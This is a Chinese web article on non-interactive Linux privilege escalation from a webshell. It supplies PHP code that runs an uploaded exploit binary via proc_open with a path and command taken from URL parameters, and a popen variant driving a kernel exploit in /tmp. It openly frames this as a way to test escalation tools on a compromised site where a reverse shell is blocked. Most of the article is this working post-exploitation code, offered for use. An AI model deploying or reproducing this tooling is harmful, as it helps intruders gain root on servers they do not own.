当前位置：首页 > 资讯 > 技术文档

Linux下非交互式提权详解

时间：2020-03-16 11:31 编辑：来源：阅读：
扫一扫，手机访问

摘要：Linux下非交互式提权详解

[b]前言[/b] 之前拿到某站的Webshell之后，在提权的时候发现网站不能反弹shell。而且，在渗透的时候经常遇到那种不能反弹shell的，你的提权工具拿上去之后因为没有交互式的环境，也不知道提权是否成功。因此，写了一个简单的工具。需要的朋友们可以参考学习。 [b]方法如下[/b] [b]proce_open()[/b]

// path是提权工具的绝对路径,例如:/usr/local/htdocs/2.6.18
// cmd是你需要执行的命令，例如:whoami
if(isset($_GET['path']) && isset($_GET['cmd'])){
 $path = $_GET['path'];
 $cmd = $_GET['cmd'];
 $descriptorspec = array(
  0 => array("pipe", "r"),
  1 => array("pipe", "w"),
  2 => array("pipe", "w")
 );
 $process = proc_open($path, $descriptorspec, $pipes);
 
 if (is_resource($process)) {
  fwrite($pipes[0],$cmd);
  fclose($pipes[0]);
  echo stream_get_contents($pipes[1]);
  echo stream_get_contents($pipes[2]);
  fclose($pipes[1]);
  fclose($pipes[2]);
  $return_value = proc_close($process);
 }  
}

代码很简单，不懂的可以看看PHP手册，[code]popen()[/code]在这里也可以实现相同的效果另外，有了这个代码之后，我们以后提权是不是就可以直接把提权工具扔到服务器上面，然后PHP代码改一改，循环测试哪些提权工具是可用的了。 [b]popen()[/b] 这是土司之前一个人发的，代码原封不动的放在了下面。稍微改一改就能达到上面一样的效果

$sucommand = "/tmp/2.6.18-2011";
$fp = popen($sucommand ,"w");
fputs($fp,"echo 22222 > /tmp/sbsbsbsbsbsb11111");
pclose($fp);

[b]总结[/b] 以上就是这篇文章的全部内容了，希望本文的内容对大家的学习或者工作能带来一定的帮助，如果有疑问大家可以留言交流，谢谢大家对编程素材网的支持。

全部评论(0)

上一篇：MSSQL注入PUBLIC权限下的xp_dirtree再度利用方法
下一篇：XSS 0DAY代码

资讯排行榜
更多>>